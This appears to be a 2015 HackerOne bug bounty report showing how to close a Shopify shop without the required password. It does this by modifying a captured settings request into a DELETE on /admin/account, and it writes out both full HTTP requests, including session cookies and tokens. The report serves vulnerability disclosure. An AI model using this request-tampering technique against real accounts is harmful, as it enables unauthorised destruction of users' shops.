Shopify: Bypassing password requirement during deletion of accout

2015-10-14T20:36:17
ID H1:93901
Type hackerone
Reporter lostboy
Modified 2015-11-03T19:06:22

Description

Hi there

There is a vulnerability exists by which i can bypass password requirement during deletion of shopify account If you want to delete you shopify account ( close the shop) you have to go to /admin/account and click on close the shop first it asks for the password and if you enter the wrong passowrd the shop will not be closed. but there is a method by which i can bypass the same

Steps to reproduce

  1. first login to your shopify account and navigate to setting https://testingdeletion.myshopify.com/admin/settings/general
  2. Update any of setting a request like this gone through if we capture it with burp proxy. ``` POST /admin/settings/general HTTP/1.1 Host: testingdeletion.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://testingdeletion.myshopify.com/admin/settings/general Cookie: _shopify_y=AA56BC56-BD71-45C1-F9C4; _shopify_s=0AB461EB-7C82-4063-8F5E; _shopify_y=AA56BC56-BD71-45C1-F9C4; _secure_admin_session_id=ef48fbbe1e8d8254f3dbc811f10def51; utma=1.1323370251.1428687464.1444226405.1444853238.14; utmz=1.1444853238.14.3.utmcsr=shopify.com|utmccn=(referral)|utmcmd=referral|utmcct=/login; _ga=GA1.2.1323370251.1428687464; mmapiwsid=8B44CEF2-E00C-11E4-815C-6E4C42B6BA89:032f8603aacce8db01ccd6f09bc34bfbc5600078; insp_slim=1443114926765; insp_wid=723062851; insp_nv=true; insp_ref=aHR0cHM6Ly9hcHAuc2hvcGlmeS5jb20vc2VydmljZXMvc2lnbnVwL3NldHVw; insp_targlpu=https%3A%2F%2Fjkspentester-hackerone.myshopify.com%2Fadmin%2Faccount_setup%3Fpos%3D; insp_targlpt=Shopify%20%E2%80%94%20Sign%20up%20for%20the%20best%20online%20store%20software; insp_norec_sess=true; ajs_user_id=null; ajs_group_id=null; _shopify_y=AA56BC56-BD71-45C1-F9C4; ajs_anonymous_id=%22a1180fe5-1d7f-4840-b842-d04e325d09b7%22; utmb=1.19.10.1444853238; utmc=1; _shopify_s=FD12D7D8-39DD-4FDA-BDE3; __utmt=1; _gat=1; _ab=1; storefront_digest=e67bfb9c7ab497911c693ec91195c37cc61d4e45f8f83ff3363c73641ffc727e; _shopify_s=FD12D7D8-39DD-4FDA-BDE3; _shopify_y=AA56BC56-BD71-45C1-F9C4; request_method=GET Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 880

utf8=%E2%9C%93&_method=patch&authenticity_token=91xWjyZhsUKFB8k4oCTGjJxxRl25pwZNXdnNHXaYsLbj17tsg8NB%2BFnERHiG449IFxHN2vbV7L%2BUb7Cl3xxJow%3D%3D&shop%5Bname%5D=testingdeletionn&shop%5Bemail%5D=sonallovesgopal%40gmail.com&shop%5Bcustomer_email%5D=sonallovesgopal%40gmail.com&shop%5Bcompany_name%5D=&shop%5Bphone%5D=9999999999&shop%5Baddress1%5D=hose+no+111&shop%5Bcity%5D=basti&shop%5Bzip%5D=111111&shop%5Bcountry%5D=IN&shop%5Bprovince%5D=Andaman+and+Nicobar&shop%5Btimezone%5D=Asia%2FCalcutta&shop%5Bunit_system%5D=metric&shop%5Bweight_unit%5D=kg&shop%5Bcurrency%5D=INR&shop%5Bmoney_with_currency_format%5D=Rs.+%7B%7Bamount%7D%7D&shop%5Bmoney_format%5D=Rs.+%7B%7Bamount%7D%7D&shop%5Bmoney_with_currency_in_emails_format%5D=Rs.+%7B%7Bamount%7D%7D&shop%5Bmoney_in_emails_format%5D=Rs.+%7B%7Bamount%7D%7D&shop%5Border_number_format_prefix%5D=%23&shop%5Border_number_format_suffix%5D= modify this like this first change this POST /admin/settings/general to this POST /admin/account now in body delete all the contents after authenticity token and paste this after it &cancel_reason%5Bselection%5D=other&cancel_reason%5Bdetailed%5D=testing change method to delete from patch this are answers of question which is asked during deletion of account now the req will look like this POST /admin/account HTTP/1.1 Host: testingdeletion.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://testingdeletion.myshopify.com/admin/settings/general Cookie: _shopify_y=AA56BC56-BD71-45C1-F9C4; _shopify_s=0AB461EB-7C82-4063-8F5E; _shopify_y=AA56BC56-BD71-45C1-F9C4; _secure_admin_session_id=ef48fbbe1e8d8254f3dbc811f10def51; utma=1.1323370251.1428687464.1444226405.1444853238.14; utmz=1.1444853238.14.3.utmcsr=shopify.com|utmccn=(referral)|utmcmd=referral|utmcct=/login; _ga=GA1.2.1323370251.1428687464; mmapiwsid=8B44CEF2-E00C-11E4-815C-6E4C42B6BA89:032f8603aacce8db01ccd6f09bc34bfbc5600078; insp_slim=1443114926765; insp_wid=723062851; insp_nv=true; insp_ref=aHR0cHM6Ly9hcHAuc2hvcGlmeS5jb20vc2VydmljZXMvc2lnbnVwL3NldHVw; insp_targlpu=https%3A%2F%2Fjkspentester-hackerone.myshopify.com%2Fadmin%2Faccount_setup%3Fpos%3D; insp_targlpt=Shopify%20%E2%80%94%20Sign%20up%20for%20the%20best%20online%20store%20software; insp_norec_sess=true; ajs_user_id=null; ajs_group_id=null; _shopify_y=AA56BC56-BD71-45C1-F9C4; ajs_anonymous_id=%22a1180fe5-1d7f-4840-b842-d04e325d09b7%22; utmb=1.19.10.1444853238; utmc=1; _shopify_s=FD12D7D8-39DD-4FDA-BDE3; __utmt=1; _gat=1; _ab=1; storefront_digest=e67bfb9c7ab497911c693ec91195c37cc61d4e45f8f83ff3363c73641ffc727e; _shopify_s=FD12D7D8-39DD-4FDA-BDE3; _shopify_y=AA56BC56-BD71-45C1-F9C4; request_method=GET Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 216

utf8=%E2%9C%93&_method=delete&authenticity_token=91xWjyZhsUKFB8k4oCTGjJxxRl25pwZNXdnNHXaYsLbj17tsg8NB%2BFnERHiG449IFxHN2vbV7L%2BUb7Cl3xxJow%3D%3D&cancel_reason%5Bselection%5D=other&cancel_reason%5Bdetailed%5D=testing ``` forward this and your shop will be closed without entering the passowrd.

if you need a poc video please let me know

jitendra